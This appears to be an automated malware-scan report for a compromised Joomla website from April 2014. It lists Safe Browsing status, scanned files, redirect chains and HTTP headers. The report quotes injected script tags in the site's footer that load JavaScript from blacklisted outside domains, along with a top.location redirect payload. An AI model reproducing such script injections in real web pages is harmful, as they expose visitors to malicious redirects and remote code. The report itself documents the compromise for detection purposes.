Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nkts-nnov.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nkts-nnov.ru/ | 200 OK Content-Length: 37183 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: expect-crown.biz ...[41341 bytes skipped]... mla! Extensions</a> library today. </p></td> </tr> <tr> <td valign="top" > </td> </tr> </table> </div> </div> </div> </div> <!-- END: BOTTOM SPOTLIGHT --> <!-- BEGIN: FOOTER --> <script type="text/javascript" charset="windows-1251" src="http://expect-crown.biz/a/91615902-nkts-nnov.ru.js"></script> <script language='javascript' type='text/javascript' src='http://irmeeting.ru/93bypxy3fo95pdk039oidw11gdv3ukph'></script> <div id="ja-footerwrap"> <div id="ja-footer" class="clearfix"> <div id="ja-footnav"> <ul id="mainlevel-nav"><li><a href="/index.php?option=com_content&view=article&id=25&Itemid=28" class="mainlevel-nav" >About Joomla!</ ...[3797 bytes skipped]... | ||
http://nkts-nnov.ru/media/system/js/caption.js | 200 OK Content-Length: 1964 Content-Type: application/javascript | clean |
http://nkts-nnov.ru/templates/ja_purity/js/ja.script.js | 200 OK Content-Length: 3208 Content-Type: application/javascript | clean |
http://nkts-nnov.ru/templates/ja_purity/js/ja.rightcol.js | 200 OK Content-Length: 1696 Content-Type: application/javascript | clean |
http://expect-crown.biz/a/91615902-nkts-nnov.ru.js | HTTP/1.1 302 Found Date: Tue, 01 Apr 2014 23:30:09 GMT Location: http://pagesinxt.com/?dn=expect-crown.biz&flrdr=yes&nxte=js Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cnection: close X-Powered-By: PHP/5.3.21 | clean |
http://pagesinxt.com/?dn=expect-crown.biz&flrdr=yes&nxte=js | HTTP/1.1 302 Found Date: Tue, 01 Apr 2014 23:30:10 GMT Location: http://mypageresults.com/?dn=expect-crown.biz&flrdr=yes&nxte=js Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 334 Content-Type: text/html; charset=iso-8859-1 X-Cnection: close | clean |
http://mypageresults.com/?dn=expect-crown.biz&flrdr=yes&nxte=js | 200 OK Content-Length: 2577 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: expect-crown.biz <!--
top.location="http://mypageresults.com/?dn=expect-crown.biz&fp=tPihWYwHKdWPSnLJo1NznnMuWkjQsLny6MnhpCwPHypnm5zOxZSwsK2Z2v%2FRw9wJWlBCbFNAAKR9TtZ0wyA%2FLw%3D%3D&prvtof=8CvqWSXlNr2xUTEdLCdXO4pLTQKn2BhRNwJ7R4oFR%2F8%3D&poru=sywnmncu9x2g8PPJYalXlmC3DYtygSN1GidAV4hyzT%2FXDMr1MPVY3jBTK%2Be5EPOQyh0qLlYWyo5EDXmMy9ngI6695hG2e9sxI695NV1pqnAcb7VyeV3aqkoNQWzabLGy&cifr=1&flrdr=yes&nxte=js"; /* --> <script type="text/javascript"> <!-- dimensionUpd ...[2433 bytes skipped]... | ||
http://mypageresults.com/?dn=expect-crown.biz&fp=tPihWYwHKdWPSnLJo1NznnMuWkjQsLny6MnhpCwPHypnm5zOxZSwsK2Z2v%2FRw9wJWlBCbFNAAKR9TtZ0wyA%2FLw%3D%3D&prvtof=f%2F3IwdSCVp2t40EeGBNcg0yP%2BOReDscTnPPcUydFrS0%3D&poru=pnxEmWnbYU2zJpH%2BHPXHvE0eC88DXhy2Qqr7VuZ0ZXu72OcedbHL3vnINqq6QNx3XUlveP88XvsdhFb%2FKrBTAzEvqsqup4%2FAe6Q5uBUxA%2BpZH3HwtG%2FZ0mjWbcQ2kQ%2BA&flrdr=yes&nxte=js | 200 OK Content-Length: 271 Content-Type: text/html | clean |
http://mypageresults.com/test404page.js | HTTP/1.1 302 Found Date: Tue, 01 Apr 2014 23:30:11 GMT Location: http://pagesinxt.com/?dn=mypageresults.com&flrdr=yes&nxte=js Server: Apache/2.2.3 (CentOS) Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cnection: close X-Powered-By: PHP/5.3.21 | clean |
http://pagesinxt.com/?dn=mypageresults.com&flrdr=yes&nxte=js | HTTP/1.1 302 Found Date: Tue, 01 Apr 2014 23:30:11 GMT Location: http://mypageresults.com/?dn=mypageresults.com&flrdr=yes&nxte=js Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 335 Content-Type: text/html; charset=iso-8859-1 X-Cnection: close | clean |
http://mypageresults.com/?dn=mypageresults.com&flrdr=yes&nxte=js | 200 OK Content-Length: 2511 Content-Type: text/html | clean |
http://mypageresults.com/?dn=mypageresults.com&fp=QsYMewbdhR22gcOkW9DKKKpKxPDTySo46AnV186rihUm6fqW6d7pMuZFeM8ikKnEyQ8PPuS5b%2BBu91tpHUr9aQ%3D%3D&prvtof=bZD998mvBo%2BbXNN3wVi%2BD%2B%2FDftHBFRE6xKkJpWwDvAc%3D&poru=UIdn0x1%2B8DAjjR1HRwuLdZEA3b2qylm1AD7Z8UUz3D4YVW2WU6T5kzrZdnB%2BugSEyWwHI74hJLD6QoFOeYplbg6Eznbravx%2F%2BMEWVh%2BjrOw%3D&flrdr=yes&nxte=js | 200 OK Content-Length: 271 Content-Type: text/html | clean |
http://irmeeting.ru/93bypxy3fo95pdk039oidw11gdv3ukph | 200 OK Content-Length: 5894 Content-Type: text/javascript | clean |
http://stats.hosting24.com/count.php | 200 OK Content-Length: 960 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nkts-nnov.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Tue, 01 Apr 2014 23:30:07 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.17
Content-Length: 37183
Content-Type: text/html;charset=windows-1251
Expires: Fri, 04 Apr 2014 00:00:00 GMT
Last-Modified: Tue, 01 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.3.17
...37183 bytes of data.
GET / HTTP/1.1
Host: nkts-nnov.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Tue, 01 Apr 2014 23:30:07 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.17
Content-Length: 37183
Content-Type: text/html;charset=windows-1251
Expires: Fri, 04 Apr 2014 00:00:00 GMT
Last-Modified: Tue, 01 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.3.17
...37183 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nkts-nnov.ru
Referer: http://www.google.com/search?q=nkts-nnov.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nkts-nnov.ru
Referer: http://www.google.com/search?q=nkts-nnov.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.